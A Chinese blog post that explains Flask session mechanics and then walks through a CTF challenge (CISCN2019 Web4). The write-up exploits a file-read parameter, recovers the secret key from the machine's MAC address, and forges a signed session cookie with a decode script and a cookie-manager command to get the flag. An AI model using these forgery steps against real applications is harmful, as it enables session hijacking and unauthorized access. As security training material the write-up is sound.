首先还是先从概念入手,最近学习越学越来越觉得自己菜
Flask-session:
概念:
session咱们都知道是基于cookjie实现的,保存在服务器的键值对,同时在浏览器的cookie中也会保存相同的随机字符串,用来再次请求时拿出来,进行验证。
注意:Flask中的session是保存在浏览器中的,默认的key是session(加密的cookie),当然也可以将其保存在数据库中
flask中有一个session对象,它允许你在不同请求间存储特定用户的信息。它是在cookie的基础上实现的,并且对cookie进行密钥签名要使用会话,你需要设置一个密钥
同request一样,session基于上下文管理
SECRET_KEY:
flask的session是通过加密后保存在cookie中的,有加密就需要有解密用的密钥,只要用到了flask的session模块,就一定要配置’SECRET_KEY’这个全局宏。一般设置为24位的字符。
配置方法一:
新建一个config.py文件配置secret_key
SECRET_KEY='XXXXXXXXXX'
然后在运行主文件里面添加config文件里面的内容
main.py:
from flask import Flask,session
import config
app=Flask(__name__)
配置方法二:
直接在主运行模块里面配置,配置config的时候也是和操作字典是一样的
main.py:
from flask import Flask,session
app=Flask(__name__)
app.config['SESSION_KEY']='XXXXXX'
或:app.secret_key='xxxxxxx'
session的操作命令:
session的操作本质和操作字典一样
增:
session['username'] = 'xxx'
查:
result=session['key'] #如果key不存在,会raise Error
result=session.get('key') #如果key不存在,返回None
删:
session.pop('key')
清空:
session.clear
session的流程:
第一次请求进来,会把session所有的值都放入内存,对session的增删查改的命令都是在内存中进行的
class SecureCookieSessionInterface(SessionInterface):open_session --> 打开,获取 app.session_cookie_name获取加密的session, 然后进行解密, save_session --> 对操作完的sesison进行加密 保存
flask中 session的流程详解
1, 用户请求的request进来,实例化RequestContext,创建request_context对象,初始化session为空
2, 当接受到用户请求之后,会调用Flask对象的session_interface对象的open_session方法,以此来获取一个session对象。
3, 数据返回给用户,并把内容中的session重新保存
参考链接:
https://www.cnblogs.com/big-handsome-guy/p/8550310.html
https://www.cnblogs.com/big-handsome-guy/p/8550310.html
[CISCN2019 华东南赛区]Web4
点击readsomething发现url添加了百度,url里多了url参数,猜测存在任意文件读取。
读取/api/app.py 有源码
# encoding:utf-8
import re, random, uuid, urllib
from flask import Flask, session, requestapp = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True@app.route('/')
def index():session['username'] = 'www-data'return 'Hello World! <a href="/read?url=https://baidu.com">Read somethings</a>'@app.route('/read')
def read():try:url = request.args.get('url')m = re.findall('^file.*', url, re.IGNORECASE)n = re.findall('flag', url, re.IGNORECASE)if m or n:return 'No Hack'res = urllib.urlopen(url)return res.read()except Exception as ex:print str(ex)return 'no response'@app.route('/flag')
def flag():if session and session['username'] == 'fuck':return open('/flag.txt').read()else:return 'Access denied'if __name__=='__main__':app.run(debug=True,host="0.0.0.0")
这就是一个flask-session题,``
app = Flask(__name__)
random.seed(uuid.getnode())
app.config['SECRET_KEY'] = str(random.random()*233)
app.debug = True
读取/sys/class/net/eth0/address可以得到了mac地址
然后咱们主要是或者secretkey
Python 2.7.18 (v2.7.18:8d21aa21f2, Apr 20 2020, 13:25:05) [MSC v.1500 64 bit (AMD64)] on win32
Type "help", "copyright", "credits" or "license" for more information.
>>> import random
>>> random.seed(0x46948203283a)
>>> print(str(random.random()*233))
103.025665766
用脚本解码我们原来的session
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decodedef decryption(payload):payload, sig = payload.rsplit(b'.', 1)payload, timestamp = payload.rsplit(b'.', 1)decompress = Falseif payload.startswith(b'.'):payload = payload[1:]decompress = Truetry:payload = base64_decode(payload)except Exception as e:raise Exception('Could not base64 decode the payload because of ''an exception')if decompress:try:payload = zlib.decompress(payload)except Exception as e:raise Exception('Could not zlib decompress the payload before ''decoding the payload')return session_json_serializer.loads(payload)if __name__ == '__main__':s = "eyJ1c2VybmFtZSI6eyIgYiI6ImQzZDNMV1JoZEdFPSJ9fQ.YlWPqw.VtwY8brhyAARA4xqls4ihtreLtc"print(decryption(s.encode()))
得到{‘username’: b’www-data’}
{‘username’: b’www-data’}改为{‘username’: b’fuck’},用flask-session插件配合秘钥加密。
G:\flask-session-manager\flask-session-cookie-manager-master>python3 flask_session_cookie_manager3.py encode -s 103.025665766 -t "{'username':b'fuck'}"
eyJ1c2VybmFtZSI6eyIgYiI6IlpuVmphdz09In19.YlWUug.asVFH_xqPhDtxofvKrBa6XqUjNs
伪造session,携带伪造的session访问flag路由即可拿到flag